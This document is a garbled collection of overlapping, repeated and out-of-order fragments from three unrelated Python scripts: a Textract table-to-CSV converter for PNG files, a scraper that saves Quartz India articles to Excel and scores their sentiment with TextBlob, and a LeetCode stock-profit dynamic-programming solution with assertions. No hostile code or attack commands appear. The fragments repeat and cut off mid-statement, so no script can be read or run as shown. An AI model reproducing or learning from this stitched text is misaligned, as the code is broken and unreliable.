get_direc(direc): \"\"\"get the lists of all files", "Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get", "def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv", "get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new =", "direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file)", "direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for", "testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to the", "files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return", "import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021", "direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0]", "utf-8 -*- import pandas as pd import os import time import glob import", "/Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\" path", "#!/usr/bin/env python # -*- coding: utf-8 -*- import pandas as pd import os", "#change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all", "<NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to the directory #cd", "3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists", "pd import os import time import glob import sys import textract_python_table_parser as tptp", "#cd 
/Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\"", "def get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\" path =", "os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc)", "fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\": direc =", "'{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ',", "directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under the", "= tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with", "sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date created:", "open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ ==", "Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the", "'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output", "the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def", "in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv'", "pandas as pd import os import time import glob import sys import textract_python_table_parser", "os import time import glob import sys import textract_python_table_parser as tptp ''' File", "= '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: 
fout.write(table_csv) print('output file saved:", "created: 12/08/2021 Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def", "= direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as", "import pandas as pd import os import time import glob import sys import", "+ 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv)", "output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file", "lists of all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list", "''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of", "get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\" path = os.path.join(direc,", "# -*- coding: utf-8 -*- import pandas as pd import os import time", "file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if", "import sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date", "direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file in" ]
[]
[ "aname = 'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\")", "= link # get page text page = requests.get(url) # parse with BFS", "get the text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into", "india none _4ca8e\") thetitle = atitle.get_text() # get main article page articlebody =", "'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1,", "the text for each article paragraphtext = [] # get url url =", "only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext)", "text for each article paragraphtext = [] # get url url = link", "myarticle = [' '.join(article) for article in thearticle] # creating excel file \"Quartz_India\"", "import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks", "'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article',", "articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text for", "for article in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns =", "weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle =", "from selenium import webdriver import time import pandas as pd import numpy as", "on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1)", "in articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text) # combine", "text articletext = soup.find_all('p')[8:] 
# print text for paragraph in articletext[:-1]: # get", "= soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href'))", "news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename =", "keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer", "[] # get url url = link # get page text page =", "= soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main article page", "a named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname", "file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news =", "article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle =", "'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink',", "wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment", "time import pandas as pd import numpy as np from datetime import datetime", "= news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename", "in pagelinks: # store the text for each article paragraphtext = [] #", "import webdriver import time import pandas as pd import numpy as np from", "[] thearticle = [] for link in pagelinks: # store the text for", 
"axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name,", "author name, if there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname", "soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main article page articlebody", "name, if there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname =", "article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1) data.to_excel(\"Sentiment_Analysis.xlsx\",index =", "'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing", "= pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews", "= BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in weblinks[5:]:", "# get the text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs", "pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle = [] for link in", "df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index =", "index=False) writer.save() # performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity", "with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if there's a", "paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join", "= False) # save article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks,", "text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article 
thearticle.append(paragraphtext) authorname.append(aname)", "thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' ,", "sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x:", "{'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols =", "webdriver import time import pandas as pd import numpy as np from datetime", "BeautifulSoup from selenium import webdriver import time import pandas as pd import numpy", "except: aname = 'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none", "if there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text()", "wks_name, index=False) writer.save() # performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\")", "'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis on", "requests from bs4 import BeautifulSoup from selenium import webdriver import time import pandas", "cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news)", "from bs4 import BeautifulSoup from selenium import webdriver import time import pandas as", "there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except:", "link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle = [] for link", "article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get", "BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if there's a named", "BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in 
weblinks[5:]: url", "'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to file data", "the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1) data.to_excel(\"Sentiment_Analysis.xlsx\",index", "oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name =", "= atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55') # get text", "_4ca8e\") thetitle = atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55') #", "\"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index", "pd import numpy as np from datetime import datetime from textblob import TextBlob", "from datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup =", "atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main article", "= [' '.join(article) for article in thearticle] # creating excel file \"Quartz_India\" df", "news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols]", "title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main", ", 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to", "pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname =", "named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname =", "try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 
'Anonymous' #", "an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle", "BeautifulSoup(page.text, 'html.parser') # get author name, if there's a named author try: abody", "[] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title", "= soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text for paragraph", "the text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an", "= soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]: # get the text", "soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname", "link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = []", "aname = abody.get_text() except: aname = 'Anonymous' # get article title atitle =", "# print text for paragraph in articletext[:-1]: # get the text only text", "['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article", "save article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews", "get page text page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text,", "main article page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] #", "link # get page text page = requests.get(url) # parse with BFS soup", "# get author name, if there's a named author try: abody = soup.find(class_='d3284", "get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() #", "# combine all paragraphs into an article thearticle.append(paragraphtext) 
authorname.append(aname) title.append(thetitle) # join paragraphs", "np from datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup", "for paragraph in articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text)", "pagelinks: # store the text for each article paragraphtext = [] # get", "'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to file", "as np from datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest')", "['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last',", "pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) #", "article page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print", "'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True)", "thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle = ['", "article in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title',", "text page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser') #", "= 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis", "= requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for", "writer.save() # performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article']", "import BeautifulSoup from 
selenium import webdriver import time import pandas as pd import", "# get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text()", "pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews =", "'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data", "to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news", "'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url =", "# store the text for each article paragraphtext = [] # get url", "'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle =", "'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author',", "numpy as np from datetime import datetime from textblob import TextBlob page =", "paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) #", "paragraphtext = [] # get url url = link # get page text", "page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text", "= [] # get url url = link # get page text page", "authorname = [] title = [] thearticle = [] for link in pagelinks:", "paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the", "'.join(article) for article in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns", "excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date'])", "file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 
'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\",", "store the text for each article paragraphtext = [] # get url url", "for each article paragraphtext = [] # get url url = link #", "page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get", "paragraph in articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text) #", "# parse with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if", "data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1) data.to_excel(\"Sentiment_Analysis.xlsx\",index = False)", "combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to", "abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 'Anonymous' # get", "= pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False)", "[] for link in pagelinks: # store the text for each article paragraphtext", "= pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news", "# creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink',", "page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = []", "= ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save", "creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article',", "= 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() #", "all paragraphs into an article 
"""Scrape the latest Quartz India articles into Quartz_India.xlsx.

Collects article links from https://qz.com/india/latest, scrapes each
article's author/title/body, merges the rows into the spreadsheet
(deduplicating on Title, newest wins), then adds a TextBlob sentiment
polarity column.

NOTE(review): reconstructed from a mangled paste. The CSS class names
('d3284 india', '_21349 india none _4ca8e', '_61c55') are build-specific
and likely stale -- confirm the selectors against the live site.
"""
import os
from datetime import datetime

import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
from selenium import webdriver  # kept from the original import block (unused here)
import time                     # kept from the original import block (unused here)
from textblob import TextBlob

# --- collect links to the latest articles -----------------------------------
page = requests.get('https://qz.com/india/latest')
soup = BeautifulSoup(page.content, 'html.parser')
weblinks = soup.find_all('article')

pagelinks = []
# the first five <article> tags are page furniture, not stories (original skip)
for link in weblinks[5:]:
    url = link.contents[0].find_all('a')[0]
    pagelinks.append('http://qz.com' + url.get('href'))

# --- scrape each article -----------------------------------------------------
authorname = []
title = []
thearticle = []
for link in pagelinks:
    # store the text for each paragraph of this article
    paragraphtext = []
    # get page text and parse it
    page = requests.get(link)
    soup = BeautifulSoup(page.text, 'html.parser')
    # get author name, if there's a named author.
    # Catch only AttributeError (find() returned None when there is no byline)
    # instead of the original bare `except:`, which also swallowed network and
    # parser failures -- and even KeyboardInterrupt.
    try:
        abody = soup.find(class_='d3284 india').find('a')
        aname = abody.get_text()
    except AttributeError:
        aname = 'Anonymous'
    # get article title
    atitle = soup.find(class_="_21349 india none _4ca8e")
    thetitle = atitle.get_text()
    # get main article container (kept from original; currently unused)
    articlebody = soup.find(class_='_61c55')
    # paragraphs: skip the first 8 (site chrome) and the trailing footer one
    articletext = soup.find_all('p')[8:]
    for paragraph in articletext[:-1]:
        # get the text only
        paragraphtext.append(paragraph.get_text())
    # combine all paragraphs into an article
    thearticle.append(paragraphtext)
    authorname.append(aname)
    title.append(thetitle)

# join paragraphs to re-create each article body
myarticle = [' '.join(article) for article in thearticle]

# --- merge with previously saved data ----------------------------------------
filename = 'Quartz_India.xlsx'
# Seed an empty workbook only when none exists yet. The original wrote the
# empty frame unconditionally and *then* read `oldnews` back from the same
# file, so the history it tried to deduplicate against was always empty.
if not os.path.exists(filename):
    seed = pd.DataFrame(columns=['Title', 'Author', 'PageLink', 'Article', 'Date'])
    seed.to_excel(filename, index=False)

# save article data to file; the scalar Date broadcasts across the rows
data = {'Title': title, 'Author': authorname, 'PageLink': pagelinks,
        'Article': myarticle, 'Date': datetime.now()}
oldnews = pd.read_excel(filename)
news = pd.DataFrame(data=data)
cols = ['Title', 'Author', 'PageLink', 'Article', 'Date']
news = news[cols]
# DataFrame.append was removed in pandas 2.0; concat is the supported spelling
afronews = pd.concat([oldnews, news])
afronews.drop_duplicates(subset='Title', keep='last', inplace=True)
# reset_index(drop=True) replaces the original reset + manual 'index'-column drop
afronews.reset_index(drop=True, inplace=True)
wks_name = 'Data'
# context manager saves and closes the workbook even if to_excel raises
with pd.ExcelWriter(filename) as writer:
    afronews.to_excel(writer, sheet_name=wks_name, index=False)

# --- sentiment analysis on the saved articles --------------------------------
data = pd.read_excel(filename)
data['Polarity Article'] = data.apply(
    lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1)
# -*- coding: utf-8 -*-
# __author__ = xiaobao
# __date__ = 2019/11/13 12:39:48
#
# LeetCode 188. Best Time to Buy and Sell Stock IV
# Given an array whose i-th element is the price of a stock on day i, find the
# maximum profit achievable with at most k transactions. You may not hold more
# than one share at a time (you must sell before buying again).
#
# Example 1: k = 2, prices = [2,4,1]       -> 2 (buy @2, sell @4)
# Example 2: k = 2, prices = [3,2,6,5,0,3] -> 7 (2->6 gives 4, then 0->3 gives 3)
# Source: https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv
import sys


class Solution:
    # def maxProfit(self, k: int, prices: List[int]) -> int:
    def maxProfit(self, k, prices):
        """Return the max profit from `prices` with at most `k` transactions.

        Time O(n*k) in the capped case, O(n) when the cap never binds;
        space O(n*k) / O(1) respectively.
        """
        n = len(prices)
        if n <= 1 or k == 0:
            return 0

        # A transaction needs at least two days, so k >= n//2 means the cap
        # can never bind: use the O(n) "unlimited transactions" recurrence.
        if k >= n // 2:
            cash = 0                 # best profit so far holding no stock
            hold = -sys.maxsize      # best profit so far holding one share
            for price in prices:
                # tuple assignment reads only the previous-day values,
                # matching the original temp-variable dance exactly
                cash, hold = max(cash, hold + price), max(hold, cash - price)
            return cash

        # dp0[i][j]: best profit after day i, <= j transactions, not holding.
        # dp1[i][j]: same, but currently holding a share.
        dp0 = [[0] * (k + 1) for _ in range(n + 1)]
        dp1 = [[0] * (k + 1) for _ in range(n + 1)]
        # Holding a share is impossible with zero days or zero transactions,
        # so seed row 0 and column 0 of dp1 with an effective -infinity.
        for j in range(k + 1):
            dp1[0][j] = -sys.maxsize
        for i in range(n + 1):
            dp1[i][0] = -sys.maxsize
        for i in range(1, n + 1):
            for j in range(1, k + 1):
                # either stay flat, or sell the share bought earlier
                dp0[i][j] = max(dp0[i - 1][j], dp1[i - 1][j] + prices[i - 1])
                # either keep holding, or open transaction j by buying today
                dp1[i][j] = max(dp1[i - 1][j], dp0[i - 1][j - 1] - prices[i - 1])
        return dp0[n][k]


# boundary tests
solution = Solution()
## len(prices) <= 1
assert(solution.maxProfit(1, []) == 0)
assert(solution.maxProfit(1, [1]) == 0)
## len(prices) = 2
assert(solution.maxProfit(1, [1,4]) == 3)
assert(solution.maxProfit(2, [1,4]) == 3)
assert(solution.maxProfit(2, [4,1]) == 0)
## len(prices) = 3
assert(solution.maxProfit(1, [1,4,8]) == 7)
assert(solution.maxProfit(1, [1,8,4]) == 7)
assert(solution.maxProfit(1, [4,1,8]) == 7)
assert(solution.maxProfit(1, [4,8,1]) == 4)
assert(solution.maxProfit(1, [8,1,4]) == 3)
assert(solution.maxProfit(1, [8,4,1]) == 0)
## len(prices) >= 4
### 0 profitable trades
assert(solution.maxProfit(1, [7,6,4,3,1]) == 0)
### 1 trade
assert(solution.maxProfit(1, [1,2,3,4,5]) == 4)
### 2 trades
assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5)
assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7)
### 3 trades
assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0)
assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6)
assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8)
assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10)
assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10)
assert(solution.maxProfit(5, [7,1,5,3,6,4,7]) == 10)
== 0)", "nLen = len(prices) if nLen <= 1 or k == 0: return 0", "给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 #", "i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for", "= 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2", "+ prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution", "的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。", "def maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self, k, prices): nLen", "7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0)", "2: # 输入: [3,2,6,5,0,3], k = 2 # 输出: 7 # 解释: 在第", "= max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k]", "assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1,", "in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j", "== 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) ==", "== 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ###", "的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k", "__date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。", "in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for j in", "代码 import sys class Solution: # def maxProfit(self, k: int, prices: List[int]) ->", "3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7)", "4) 
